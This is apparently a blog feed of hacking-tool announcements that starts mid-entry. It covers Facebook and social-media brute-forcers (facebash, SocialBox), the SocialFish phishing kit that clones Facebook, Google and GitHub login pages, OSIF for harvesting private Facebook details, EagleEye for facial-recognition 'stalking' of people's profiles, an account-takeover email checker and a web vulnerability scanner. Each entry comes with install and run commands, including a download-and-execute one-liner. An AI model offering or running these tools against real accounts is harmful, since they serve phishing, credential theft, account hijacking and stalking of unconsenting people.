cd instashell
chmod +x facebash.sh
service tor start
sudo ./facebash.sh</code></pre>
<br />
<b>Install <a href="https://www.kitploit.com/search/label/Requirements" target="_blank" title="requirements">requirements</a> (Curl, Tor):</b><br />
<pre><code>chmod +x install.sh
sudo ./install.sh</code></pre>
<br />
<br />
<div style="text-align: center;">
<b><span style="font-size: x-large;"><a class="kiploit-download" href="https://github.com/thelinuxchoice/facebash" rel="nofollow" target="_blank" title="Download Facebash">Download Facebash</a></span></b></div>
Unknownnoreply@blogger.comtag:blogger.com,1999:blog-8317222231133660547.post-3480340319983761392019-05-19T10:02:00.000-04:002019-05-19T10:02:02.272-04:00OSIF - Open Source Information Facebook<div style="text-align: justify;">
OSIF is an accurate <a href="https://www.kitploit.com/search/label/Facebook" target="_blank" title="facebook">facebook</a> account information gathering, all <a href="https://www.kitploit.com/search/label/Sensitive%20Information" target="_blank" title="sensitive information">sensitive information</a> can be easily gathered even though the target converts all of its <a href="https://www.kitploit.com/search/label/Privacy" target="_blank" title="privacy">privacy</a> to (only me), Sensitive information about residence, date of birth, occupation, <a href="https://www.kitploit.com/search/label/Phone" target="_blank" title="phone">phone</a> number and email address.</div>
<a name='more'></a><br />
<span style="font-size: large;"><b>Installation</b></span><br />
<pre><code>$ pkg update upgrade
$ pkg install git python2
$ git clone https://github.com/ciku370/OSIF
$ cd OSIF</code></pre>
<br />
<span style="font-size: large;"><b>Setup</b></span><br />
<pre><code>$ pip2 install -r requirements.txt</code></pre>
<br />
<span style="font-size: large;"><b>Running</b></span><br />
<pre><code>$ python2 osif.py</code></pre>
<br />
<b><span style="font-size: large;">Screenshot</span></b><br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://1.bp.blogspot.com/-Qp7S10soXvY/XNZZsiLAcyI/AAAAAAAAO5k/6XscU0MmPjMGBwqCXrDZARwARoZDIvHDgCLcBGAs/s1600/osif.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="854" data-original-width="480" src="https://1.bp.blogspot.com/-Qp7S10soXvY/XNZZsiLAcyI/AAAAAAAAO5k/6XscU0MmPjMGBwqCXrDZARwARoZDIvHDgCLcBGAs/s1600/osif.png" /></a></div>
<ul>
<li>if you are confused how to use it, please type 'help' to display the help menu</li>
<li>[Warn] please turn off your <a href="https://www.kitploit.com/search/label/VPN" target="_blank" title="VPN">VPN</a> before using this program !!!</li>
<li>[Tips] do not overuse this program !!!</li>
</ul>
<br />
<br />
<div style="text-align: center;">
<b><span style="font-size: x-large;"><a class="kiploit-download" href="https://github.com/CiKu370/OSIF" rel="nofollow" target="_blank" title="Download OSIF">Download OSIF</a></span></b></div>
Unknownnoreply@blogger.comtag:blogger.com,1999:blog-8317222231133660547.post-80109513982584809672019-03-14T17:12:00.001-03:002019-03-14T17:12:22.011-03:00SocialFish v2 - Educational Phishing Tool & Information Collector<div class="separator" style="clear: both; text-align: center;">
<a href="https://3.bp.blogspot.com/-ppn_F9ndGf4/XIq1Tu3hUkI/AAAAAAAAOQc/GSwQENkz01UZXbUj5AoyZb9XMIvs58OPACLcBGAs/s1600/SocialFish_2_screen.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="763" data-original-width="1600" height="304" src="https://3.bp.blogspot.com/-ppn_F9ndGf4/XIq1Tu3hUkI/AAAAAAAAOQc/GSwQENkz01UZXbUj5AoyZb9XMIvs58OPACLcBGAs/s640/SocialFish_2_screen.png" width="640" /></a></div>
<div class="separator" style="clear: both; text-align: center;">
<br /></div>
<br />
<div style="text-align: left;">
Ultimate phishing tool with Ngrok integrated.</div>
<br />
Are you looking for SF's mobile controller? <a href="https://github.com/UndeadSec/SocialFishMobile">UndeadSec/SocialFishMobile</a><br />
<br />
<span style="font-size: large;"><b>PREREQUISITES</b></span><br />
<ul>
<li>Python 2.7</li>
<li>Wget from Python</li>
<li>PHP</li>
</ul>
<a name='more'></a><br />
<span style="font-size: x-large;"><b>TESTED ON</b></span><br />
<strong>Kali Linux - ROLLING EDITION</strong><br />
<br />
<span style="font-size: large;"><b>CLONE</b></span><br />
<pre><code>git clone https://github.com/UndeadSec/SocialFish.git</code></pre>
<br />
<span style="font-size: large;"><b>RUNNING</b></span><br />
<pre><code>cd SocialFish
sudo pip install -r requirements.txt
python SocialFish.py</code></pre>
<br />
<span style="font-size: x-large;"><b>AVAILABLE PAGES</b></span><br />
<strong>+ Facebook:</strong><br />
<ul>
<li>Traditional <a href="http://www.kitploit.com/search/label/Facebook">Facebook</a> login page.</li>
<li>Advanced login with Facebook.</li>
</ul>
<strong>+ Google:</strong><br />
<ul>
<li>Traditional Google login page.</li>
<li>Advanced login with Facebook.</li>
</ul>
<strong>+ LinkedIN:</strong><br />
<ul>
<li>Traditional LinkedIN login page.</li>
</ul>
<strong>+ Github:</strong><br />
<ul>
<li>Traditional Github login page.</li>
</ul>
<strong>+ Stackoverflow:</strong><br />
<ul>
<li>Traditional Stackoverflow login page.</li>
</ul>
<strong>+ Wordpress:</strong><br />
<ul>
<li>Similar Wordpress login page.</li>
</ul>
<div>
<br /></div>
<b><span style="font-size: x-large;">VIDEO</span></b><br />
<br />
<div style="text-align: center;">
<iframe allow="autoplay; encrypted-media" allowfullscreen="" frameborder="0" height="360" src="https://www.youtube.com/embed/mj6nnD5zzaE" width="640"></iframe></div>
<br />
<br />
<br />
<div style="text-align: center;">
<b><span style="font-size: x-large;"><a href="https://github.com/UndeadSec/SocialFish" rel="nofollow" target="_blank">Download SocialFish</a></span></b></div>
Unknownnoreply@blogger.comtag:blogger.com,1999:blog-8317222231133660547.post-36691704450967495932018-09-26T09:19:00.000-03:002018-09-26T09:19:14.836-03:00SocialBox - A Bruteforce Attack Framework (Facebook, Gmail, Instagram, Twitter)<div class="separator" style="clear: both; text-align: center;">
<a href="https://2.bp.blogspot.com/-H39-ToZJbq0/W6sJGBfSELI/AAAAAAAAMoY/1GDHfvLLZ-8U4oBUkg-CVuoxDFb-6T3_gCLcBGAs/s1600/SocialBox_1_sb.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="405" data-original-width="577" height="448" src="https://2.bp.blogspot.com/-H39-ToZJbq0/W6sJGBfSELI/AAAAAAAAMoY/1GDHfvLLZ-8U4oBUkg-CVuoxDFb-6T3_gCLcBGAs/s640/SocialBox_1_sb.png" width="640" /></a></div>
<br />
<div style="text-align: justify;">
SocialBox is a <a href="http://www.kitploit.com/search/label/Bruteforce">Bruteforce</a> Attack Framework [<a href="http://www.kitploit.com/search/label/Facebook">Facebook</a>, Gmail, <a href="http://www.kitploit.com/search/label/Instagram">Instagram</a>,Twitter], Coded By Belahsan Ouerghi.</div>
<a name='more'></a><br />
<span style="font-size: large;"><b>Installation</b></span><br />
<pre><code>sudo apt-get install git
sudo git clone https://github.com/TunisianEagles/SocialBox.git
cd SocialBox
chmod +x SocialBox.sh
chmod +x install-sb.sh
./install-sb.sh
./SocialBox.sh</code></pre>
<br />
<span style="font-size: large;"><b>Screenshots:</b></span><br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://3.bp.blogspot.com/-3tYKO74SiE0/W6sJQpvWoOI/AAAAAAAAMoc/uE0QSm4MtHMTyIGjrEeDIbmKRBii1hqDgCLcBGAs/s1600/SocialBox_2_com.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="629" data-original-width="567" height="640" src="https://3.bp.blogspot.com/-3tYKO74SiE0/W6sJQpvWoOI/AAAAAAAAMoc/uE0QSm4MtHMTyIGjrEeDIbmKRBii1hqDgCLcBGAs/s640/SocialBox_2_com.png" width="576" /></a></div>
<br />
<span style="font-size: large;"><b>Tested On :</b></span><br />
<ul>
<li>Backbox linux</li>
<li>Ubuntu</li>
<li>Kali linux</li>
</ul>
<br />
<span style="font-size: large;"><b>Contact</b></span><br />
<ul>
<li><a href="https://www.facebook.com/ouerghi.belahsan" rel="nofollow" target="_blank">Contact</a> - Belahsan Ouerghi</li>
</ul>
<br />
<span style="font-size: large;"><b>Authors :</b></span><br />
<ul>
<li>facebook : Imad</li>
<li>gmail : Ha3MrX</li>
<li>instagram : thelinuxchoice</li>
<li>Twitter : thelinuxchoice</li>
<li>SocialBox : Belahsan Ouerghi</li>
</ul>
<br />
<br />
<div style="text-align: center;">
<b><span style="font-size: x-large;"><a href="https://github.com/TunisianEagles/SocialBox" rel="nofollow" target="_blank">Download SocialBox</a></span></b></div>
Unknownnoreply@blogger.comtag:blogger.com,1999:blog-8317222231133660547.post-72149870731561388262018-07-02T09:45:00.000-04:002018-07-02T09:45:32.084-04:00EagleEye - Stalk Your Friends. Find Their Instagram, FB And Twitter Profiles Using Image Recognition And Reverse Image Search<div class="separator" style="clear: both; text-align: center;">
<a href="https://4.bp.blogspot.com/-nBFqq9jg4KE/WzU2mswLI0I/AAAAAAAALrM/oXbrXeSNJuEx6N_gCdKZ_tSTCY1CQAe1wCLcBGAs/s1600/EagleEye_4.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="673" data-original-width="943" height="456" src="https://4.bp.blogspot.com/-nBFqq9jg4KE/WzU2mswLI0I/AAAAAAAALrM/oXbrXeSNJuEx6N_gCdKZ_tSTCY1CQAe1wCLcBGAs/s640/EagleEye_4.png" width="640" /></a></div>
<br />
<div style="text-align: justify;">
Stalk Your Friends. Find Their Instagram, FB And Twitter Profiles Using Image Recognition And Reverse Image Search.</div>
<div style="text-align: justify;">
<strong><br /></strong></div>
<div style="text-align: justify;">
<strong>This only works if their <a href="http://www.kitploit.com/search/label/Facebook">Facebook</a> Profile is public</strong></div>
<div style="text-align: justify;">
<br /></div>
<div style="text-align: justify;">
<span style="font-size: x-large;"><b>What does this do?</b></span></div>
<div style="text-align: justify;">
In simple words you have at least one Image of the Person you are looking for and a clue about its name. You feed this program with it and it tries to find Instagram, Youtube, Facebook, <a href="http://www.kitploit.com/search/label/Twitter">Twitter</a> Profiles of this Person.</div>
<div style="text-align: justify;">
</div>
<a name='more'></a><br />
<div style="text-align: justify;">
<span style="font-size: x-large;"><b>How does it work?</b></span></div>
<div style="text-align: justify;">
You give it a name and at least one photo. It then searches Facebook for this name and does Facial Recognition to determine the right Facebook Profile. After that it does a Google and ImageRaider <a href="http://www.kitploit.com/search/label/Reverse">Reverse</a> Image Search to find other Social Media Profiles.</div>
<div style="text-align: justify;">
If a <a href="http://www.kitploit.com/search/label/Instagram">Instagram</a> Profile was found it will be verified by comparing your known photo of the Person to some of the Instagram Pictures.</div>
<div style="text-align: justify;">
In the end you get a PDF Report :)</div>
<br />
<span style="font-size: x-large;"><b>How to use it</b></span><br />
<br />
<span style="font-size: large;"><b>Automated Prequisites Installation</b></span><br />
<pre><code>wget https://raw.githubusercontent.com/ThoughtfulDev/EagleEye/master/pre.sh && chmod +x pre.sh && ./pre.sh</code></pre>
<br />
<span style="font-size: large;"><b>Manual Prequisites Installation</b></span><br />
<pre><code>$ sudo apt update && sudo apt upgrade -y
$ sudo apt install git python3 python3-pip python3-dev
$ sudo apt install libgtk-3-dev libboost-all-dev build-essential cmake libffi-dev
$ git clone https://github.com/ThoughtfulDev/EagleEye
$ cd EagleEye && sudo pip3 install -r requirements.txt
$ sudo pip3 install --upgrade beautifulsoup4 html5lib spry</code></pre>
Regardless of which option you choose make sure that you have <a href="http://www.kitploit.com/search/label/Firefox">Firefox</a> installed If you have Firefox installed, download the <a href="https://github.com/mozilla/geckodriver/releases/latest" rel="nofollow" target="_blank">latest release</a> of the Geckodriver for you Architecture.<br />
<strong>Note: If you are using Firefox ESR(like Kali does) please use the Geckodriver Version 17</strong><br />
Next change the value in <code>config.json</code> to the path of the geckodriver e.g<br />
<pre><code>{
"DEFAULTS": {
...
},
"WEBDRIVER": {
"ENGINE": "firefox",
"PATH": "PATH TO geckodriver e.g C:\\Program Files\\geckodriver.exe"
},
"FILTER": [
....
],
...
}</code></pre>
Make the Geckodriver executable<br />
<pre><code>$ chmod +x /path/to/geckodriver</code></pre>
<em>I will try to implement the Chrome Webdriver as soon as possible</em><br />
Next put at least one Image of the Person you want to find in the <code>known</code> folder. (<strong>Has to be .jpg for now</strong>)<br />
Then run the program ;)<br />
<pre><code>$ python3 eagle-eye.py</code></pre>
To see a list of all available Options just type<br />
<pre><code>$ python3 eagle-eye.py -h</code></pre>
<em>The ImageRaider Reverse Image Search can take some minutes 1-15 Minutes depending on the count of Images</em><br />
<br />
<span style="font-size: x-large;"><b>Screenshots?</b></span><br />
<a href="https://github.com/ThoughtfulDev/EagleEye/blob/master/Example.pdf" rel="nofollow" target="_blank">Example Report</a> (Used one Image of Emeraude Toubia)<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://2.bp.blogspot.com/-nBFqq9jg4KE/WzU2mswLI0I/AAAAAAAALrM/DN67oCO6ip0XeIX4MnTBYvMzf95rh2xOwCEwYBhgL/s1600/EagleEye_4.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="673" data-original-width="943" height="456" src="https://2.bp.blogspot.com/-nBFqq9jg4KE/WzU2mswLI0I/AAAAAAAALrM/DN67oCO6ip0XeIX4MnTBYvMzf95rh2xOwCEwYBhgL/s640/EagleEye_4.png" width="640" /></a></div>
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://3.bp.blogspot.com/-aar_QEduAmI/WzU2zfkYxPI/AAAAAAAALrU/2npJeYTWB9k6O1EdiS74bYInuU3hNJUGQCLcBGAs/s1600/EagleEye_5.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="654" data-original-width="1036" height="404" src="https://3.bp.blogspot.com/-aar_QEduAmI/WzU2zfkYxPI/AAAAAAAALrU/2npJeYTWB9k6O1EdiS74bYInuU3hNJUGQCLcBGAs/s640/EagleEye_5.png" width="640" /></a></div>
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://4.bp.blogspot.com/-9Nrgj8EbPA8/WzU2zF3RwaI/AAAAAAAALrQ/K1gUXxk0-1o2QZwLPHrbIPNqo6jeBWg4wCLcBGAs/s1600/EagleEye_6.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="471" data-original-width="1034" height="290" src="https://4.bp.blogspot.com/-9Nrgj8EbPA8/WzU2zF3RwaI/AAAAAAAALrQ/K1gUXxk0-1o2QZwLPHrbIPNqo6jeBWg4wCLcBGAs/s640/EagleEye_6.png" width="640" /></a></div>
<br />
<br />
<div style="text-align: center;">
<b><span style="font-size: x-large;"><a href="https://github.com/ThoughtfulDev/EagleEye" rel="nofollow" target="_blank">Download EagleEye</a></span></b></div>
Unknownnoreply@blogger.comtag:blogger.com,1999:blog-8317222231133660547.post-11448869796184937042018-03-05T17:12:00.000-03:002018-03-05T17:12:13.079-03:00Aragog - Facebook Invalid Email Checker<div class="separator" style="clear: both; text-align: center;">
<a href="https://3.bp.blogspot.com/-HBP_SX4z_v4/WpzR9gfqesI/AAAAAAAAKbs/8LwqGREl7-MVoU_I2vf34dSmxYZdYVOJQCLcBGAs/s1600/aragog_1.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="659" data-original-width="796" height="528" src="https://3.bp.blogspot.com/-HBP_SX4z_v4/WpzR9gfqesI/AAAAAAAAKbs/8LwqGREl7-MVoU_I2vf34dSmxYZdYVOJQCLcBGAs/s640/aragog_1.png" width="640" /></a></div>
<br />
<div style="text-align: justify;">
Aragog is a python 2.7 script which looks for Facebook Accounts that have invalid emails on their account. This script was only created for Gmail & Hotmail to be checked, but in the future this could be further upgraded in new features.</div>
<div style="text-align: justify;">
The attack scenario through this script is if the email of the account doesn't exist, the hacker will create a new one same as the Facebook Account and do a reset password. The usage of this script is through putting all the email accounts into filename.txt then run the script and write the mail-list. And the script is going to filter invalid and only take Hotmail & Gmail Accounts.</div>
<a name='more'></a><br />
<div style="text-align: justify;">
<span style="font-size: large;"><b>Info</b></span></div>
<div style="text-align: justify;">
This application is only tested on <a href="http://www.kitploit.com/search/label/Kali">Kali</a> Linux, but with few modifications you could easy run it into Windows.</div>
<div style="text-align: justify;">
<br /></div>
<div style="text-align: justify;">
<span style="font-size: large;"><b>Credits</b></span></div>
<div style="text-align: justify;">
Created by <a href="https://web.facebook.com/florianx00" rel="nofollow" target="_blank">florianx00</a></div>
<br />
<br />
<div style="text-align: center;">
<b><span style="font-size: x-large;"><a href="https://github.com/floriankunushevci/aragog" rel="nofollow" target="_blank">Download Aragog</a></span></b></div>
Unknownnoreply@blogger.comtag:blogger.com,1999:blog-8317222231133660547.post-83722879029766321292018-01-31T09:39:00.000-03:002018-02-01T12:30:33.846-03:00SocialFish - Ultimate phishing tool with Ngrok integrated<div class="separator" style="clear: both; text-align: center;">
<a href="https://1.bp.blogspot.com/-Y9iHydCgwsU/WnFknXxmzHI/AAAAAAAAKFg/2RYDgVep5_gB4tQOdefMC9c9_GNKfeo2ACLcBGAs/s1600/SocialFish_3_sc.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="900" data-original-width="1600" height="360" src="https://1.bp.blogspot.com/-Y9iHydCgwsU/WnFknXxmzHI/AAAAAAAAKFg/2RYDgVep5_gB4tQOdefMC9c9_GNKfeo2ACLcBGAs/s640/SocialFish_3_sc.png" width="640" /></a></div>
<br />
<div style="text-align: left;">
Ultimate phishing tool with Ngrok integrated.</div>
<br />
<span style="font-size: large;"><b>PREREQUISITES</b></span><br />
<ul>
<li>Python 2.7</li>
<li>Wget from Python</li>
<li>PHP</li>
</ul>
<a name='more'></a><br />
<span style="font-size: x-large;"><b>TESTED ON</b></span><br />
<strong>Kali Linux - ROLLING EDITION</strong><br />
<br />
<span style="font-size: large;"><b>CLONE</b></span><br />
<pre><code>git clone https://github.com/UndeadSec/SocialFish.git</code></pre>
<br />
<span style="font-size: large;"><b>RUNNING</b></span><br />
<pre><code>cd SocialFish
sudo pip install -r requirements.txt
python SocialFish.py</code></pre>
<br />
<span style="font-size: x-large;"><b>AVAILABLE PAGES</b></span><br />
<strong>+ Facebook:</strong><br />
<ul>
<li>Traditional <a href="http://www.kitploit.com/search/label/Facebook">Facebook</a> login page.</li>
<li>Advanced login with Facebook.</li>
</ul>
<strong>+ Google:</strong><br />
<ul>
<li>Traditional Google login page.</li>
<li>Advanced login with Facebook.</li>
</ul>
<strong>+ LinkedIN:</strong><br />
<ul>
<li>Traditional LinkedIN login page.</li>
</ul>
<strong>+ Github:</strong><br />
<ul>
<li>Traditional Github login page.</li>
</ul>
<strong>+ Stackoverflow:</strong><br />
<ul>
<li>Traditional Stackoverflow login page.</li>
</ul>
<strong>+ Wordpress:</strong><br />
<ul>
<li>Similar Wordpress login page.</li>
</ul>
<div>
<br /></div>
<b><span style="font-size: x-large;">VIDEO</span></b><br />
<br />
<div style="text-align: center;">
<iframe allow="autoplay; encrypted-media" allowfullscreen="" frameborder="0" height="360" src="https://www.youtube.com/embed/mj6nnD5zzaE" width="640"></iframe></div>
<br />
<br />
<br />
<div style="text-align: center;">
<b><span style="font-size: x-large;"><a href="https://github.com/UndeadSec/SocialFish" rel="nofollow" target="_blank">Download SocialFish</a></span></b></div>
Unknownnoreply@blogger.comtag:blogger.com,1999:blog-8317222231133660547.post-75005987678013465852017-11-27T10:15:00.000-03:002017-11-27T10:15:02.159-03:00Zeus-Scanner - Advanced Reconnaissance Utility<div style="text-align: justify;">
<div class="separator" style="clear: both; text-align: center;">
<a href="https://3.bp.blogspot.com/-OgYqg2chCc8/Whnh6yb_Q6I/AAAAAAAAJhE/iaGROlYmhNo5trPPJ_vSUyC8zq5-DxKsQCLcBGAs/s1600/Zeus-scanner.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="683" data-original-width="1306" height="334" src="https://3.bp.blogspot.com/-OgYqg2chCc8/Whnh6yb_Q6I/AAAAAAAAJhE/iaGROlYmhNo5trPPJ_vSUyC8zq5-DxKsQCLcBGAs/s640/Zeus-scanner.png" width="640" /></a></div>
<br /></div>
<div style="text-align: justify;">
Zeus is an advanced <a href="http://www.kitploit.com/search/label/Reconnaissance">reconnaissance</a> utility designed to make web application <a href="http://www.kitploit.com/search/label/Reconnaissance">reconnaissance</a> simple. Zeus comes complete with a powerful built-in URL parsing engine, multiple search engine compatibility, the ability to extract URLs from both ban and webcache URLs, the ability to run multiple vulnerability assessments on the target, and is able to bypass search engine captchas.<br />
<a name='more'></a></div>
<div style="text-align: justify;">
<br /></div>
<div style="text-align: justify;">
<span style="font-size: large;"><b>Features</b></span></div>
<ul>
<li style="text-align: justify;">A powerful built in URL parsing engine</li>
<li style="text-align: justify;">Multiple search engine compatibility (<code>DuckDuckGo</code>, <code>AOL</code>, <code>Bing</code>, and <code>Google</code> default is <code>Google</code>)</li>
<li style="text-align: justify;">Ability to extract the URL from Google's ban URL thus bypassing IP blocks</li>
<li style="text-align: justify;">Ability to extract from Google's webcache URL</li>
<li style="text-align: justify;">Proxy compatibility (<code>http</code>, <code>https</code>, <code>socks4</code>, <code>socks5</code>)</li>
<li style="text-align: justify;">Tor proxy compatibility and Tor browser emulation</li>
<li style="text-align: justify;">Parse <code>robots.txt</code>/<code>sitemap.xml</code> and save them to a file</li>
<li style="text-align: justify;">Multiple vulnerability assessments (XSS, SQLi, clickjacking, port scanning, admin panel finding, whois lookups, and more)</li>
<li style="text-align: justify;">Tamper scripts to obfuscate XSS payloads</li>
<li style="text-align: justify;">Can run with a custom default user-agent, one of over 4000 random user-agents, or a personal user-agent</li>
<li style="text-align: justify;">Automatic issue creation when an unexpected error arises</li>
<li style="text-align: justify;">Ability to crawl a webpage and pull all the links</li>
<li style="text-align: justify;">Can run a singular dork, multiple dorks in a given file, or a random dork from a list of over 5000 carefully researched dorks</li>
<li style="text-align: justify;">Dork blacklisting when no sites are found with the search query, will save the query to a blacklist file</li>
<li style="text-align: justify;">Identify WAF/IPS/IDS protection of over 20 different firewalls</li>
<li style="text-align: justify;">Header protection <a href="http://www.kitploit.com/search/label/Enumeration">enumeration</a> to check what kind of protection is provided via HTTP headers</li>
<li style="text-align: justify;">Saving cookies, headers, and other vital information to log files</li>
<li style="text-align: justify;">and much more...</li>
</ul>
<div style="text-align: justify;">
<br /></div>
<div style="text-align: justify;">
<span style="font-size: large;"><b>Screenshots</b></span></div>
<div style="text-align: justify;">
<br /></div>
<div style="text-align: justify;">
Running without a mandatory options, or running the <code>--help</code> flag will output Zeus's help menu:</div>
<div style="text-align: justify;">
<br /></div>
<div class="separator" style="clear: both; text-align: center;">
<a href="https://3.bp.blogspot.com/-zwG8J345QhM/WhnhauWDG-I/AAAAAAAAJg0/czzDhQH8E4Aj3kGnQFWp_03YmAj2CwQvQCLcBGAs/s1600/Zeus-Scanner_7_30176257-63391c62-93c7-11e7-94d7-68fde7818381.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="731" data-original-width="1256" height="372" src="https://3.bp.blogspot.com/-zwG8J345QhM/WhnhauWDG-I/AAAAAAAAJg0/czzDhQH8E4Aj3kGnQFWp_03YmAj2CwQvQCLcBGAs/s640/Zeus-Scanner_7_30176257-63391c62-93c7-11e7-94d7-68fde7818381.png" width="640" /></a></div>
<div style="text-align: justify;">
<br /></div>
<div style="text-align: justify;">
A basic dork scan with the <code>-d</code> flag, from the given dork will launch an automated browser and pull the Google page results:</div>
<div style="text-align: justify;">
<br /></div>
<div class="separator" style="clear: both; text-align: center;">
<a href="https://1.bp.blogspot.com/-pbleayjajuc/WhnhgP7VTwI/AAAAAAAAJg4/tC1qd9cInnkulkWYxDCrejHPV6pHL-paACLcBGAs/s1600/Zeus-Scanner_8_30176252-618b191a-93c7-11e7-84d2-572c12994c4d.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="656" data-original-width="1292" height="324" src="https://1.bp.blogspot.com/-pbleayjajuc/WhnhgP7VTwI/AAAAAAAAJg4/tC1qd9cInnkulkWYxDCrejHPV6pHL-paACLcBGAs/s640/Zeus-Scanner_8_30176252-618b191a-93c7-11e7-84d2-572c12994c4d.png" width="640" /></a></div>
<div style="text-align: justify;">
<br /></div>
<div style="text-align: justify;">
Calling the <code>-s</code> flag will prompt for you to start the sqlmap API server <code>python sqlmapapi.py -s</code> from sqlmap, it will then connect to the API and perform a sqlmap scan on the found URL's. </div>
<div style="text-align: justify;">
<br /></div>
<div class="separator" style="clear: both; text-align: center;">
<a href="https://4.bp.blogspot.com/-EsbG6_pazXU/WhnhlUjEQoI/AAAAAAAAJg8/UpE0siOvACo2Mw2Eq9n5oeBQqZWsBMLhwCLcBGAs/s1600/Zeus-Scanner_9_30176259-6657b304-93c7-11e7-81f8-0ed09a6c0268.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="740" data-original-width="1300" height="364" src="https://4.bp.blogspot.com/-EsbG6_pazXU/WhnhlUjEQoI/AAAAAAAAJg8/UpE0siOvACo2Mw2Eq9n5oeBQqZWsBMLhwCLcBGAs/s640/Zeus-Scanner_9_30176259-6657b304-93c7-11e7-81f8-0ed09a6c0268.png" width="640" /></a></div>
<div style="text-align: justify;">
<br /></div>
You can see more screenshots <a href="https://github.com/Ekultek/Zeus-Scanner/wiki/Screenshots" rel="nofollow" target="_blank">here</a><br />
<br />
<span style="font-size: large;"><b>Demo</b></span><br />
<div style="text-align: center;">
<iframe allowfullscreen="" frameborder="0" height="321" mozallowfullscreen="" src="https://player.vimeo.com/video/239885768" webkitallowfullscreen="" width="640"></iframe></div>
<br />
<br />
<span style="font-size: large;"><b>Requirements</b></span><br />
There are some requirements for this to be run successfully.<br />
<br />
<b>Basic requirements</b><br />
<ul>
<li><code>libxml2-dev</code>, <code>libxslt1-dev</code>, <code>python-dev</code> are required for the installation process</li>
<li>Firefox web browser is required as of now, you will need Firefox version <code><=57 >=51</code> (between 51 and 57). Full functionality for other <a href="http://www.kitploit.com/search/label/Browsers">browsers</a> will eventually be added.</li>
<li>If you want to run sqlmap through the URL's you will need sqlmap somewhere on your system.</li>
<li>If you want to run a port scan using nmap on the URL's IP addresses. You will need nmap on your system.</li>
<li><a href="https://github.com/mozilla/geckodriver" rel="nofollow" target="_blank">Geckodriver</a> is required to run the firefox web browser and will be installed the first time you run. It will be added to your <code>/usr/bin</code> so that it can be run in your ENV PATH.</li>
<li>You must be <code>sudo</code> for the first time running this so that you can add the driver to your PATH, you also may need to run as <code>sudo</code> depending on your permissions. <em>NOTE:</em> <code>Depending on permissions you may need to be sudo for any run involving the geckodriver</code></li>
<li><code>xvfb</code> is required by <code>pyvirtualdisplay</code>, it will be installed if not installed on your first run</li>
</ul>
<br />
<b>Python package requirements</b><br />
<ul>
<li><a href="http://www.seleniumhq.org/projects/webdriver/" rel="nofollow" target="_blank">selenium-webdriver</a> package is required to automate the web browser and bypass API calls.</li>
<li><a href="http://docs.python-requests.org/en/master/" rel="nofollow" target="_blank">requests</a> package is required to connect to the URL, and the sqlmap API</li>
<li><a href="http://xael.org/pages/python-nmap-en.html" rel="nofollow" target="_blank">python-nmap</a> package is required to run nmap on the URL's IP addresses</li>
<li><a href="https://github.com/spookyowl/witchcraft" rel="nofollow" target="_blank">whichcraft</a> package is required to check if nmap and sqlmap are on your system if you want to use them</li>
<li><a href="https://pyvirtualdisplay.readthedocs.io/en/latest/" rel="nofollow" target="_blank">pyvirtualdisplay</a> package is required to hide the browser display while finding the search URL</li>
<li><a href="https://lxml.readthedocs.io/en/latest/" rel="nofollow" target="_blank">lxml</a> is required to parse XML data for the sitemap and save it as such</li>
<li><a href="https://github.com/giampaolo/psutil" rel="nofollow" target="_blank">psutil</a> is required to search for running sqlmap API sessions</li>
<li><a href="https://www.crummy.com/software/BeautifulSoup/bs4/doc/" rel="nofollow" target="_blank">beautifulsoup</a> is required to pull all the HREF descriptor tags and parse the HTML into an easily workable syntax</li>
</ul>
<br />
<span style="font-size: large;"><b>Installation</b></span><br />
You can download the latest <a href="https://github.com/ekultek/zeus-scanner/tarball/master" rel="nofollow" target="_blank">tar.gz</a>, the latest <a href="https://github.com/ekultek/zeus-scanner/zipball/master" rel="nofollow" target="_blank">zip</a>, or you can find the current stable release <a href="https://github.com/Ekultek/Zeus-Scanner/releases/tag/v1.2" rel="nofollow" target="_blank">here</a>. Alternatively you can install the latest development version by following the instructions that best match your operating system:<br />
<strong><em>NOTE: (optional but highly advised)</em></strong> add sqlmap and nmap to your environment PATH by moving them to <code>/usr/bin</code> or by adding them to the PATH via terminal<br />
<br />
<b>Ubuntu/Debian</b><br />
<pre><code>sudo apt-get install libxml2-dev libxslt1-dev python-dev && git clone https://github.com/ekultek/zeus-scanner.git && cd zeus-scanner && sudo pip2 install -r requirements.txt && sudo python zeus.py</code></pre>
<br />
<b>centOS</b><br />
<pre><code>sudo apt-get install gcc python-devel libxml2-dev libxslt1-dev python-dev && git clone https://github.com/ekultek/zeus-scanner.git && cd zeus-scanner && sudo pip2 install -r requirements.txt && sudo python zeus.py</code></pre>
<br />
<b>Others</b><br />
<pre><code>sudo apt-get install libxml2-dev libxslt1-dev python-dev && git clone https://github.com/ekultek/zeus-scanner.git && cd zeus-scanner && sudo pip2 install -r requirements.txt && sudo python zeus.py</code></pre>
This will install all the package requirements along with the geckodriver<br />
<br />
<br />
<div style="text-align: center;">
<b><span style="font-size: x-large;"><a href="https://github.com/ekultek/zeus-scanner" rel="nofollow" target="_blank">Download Zeus-Scanner</a></span></b></div>
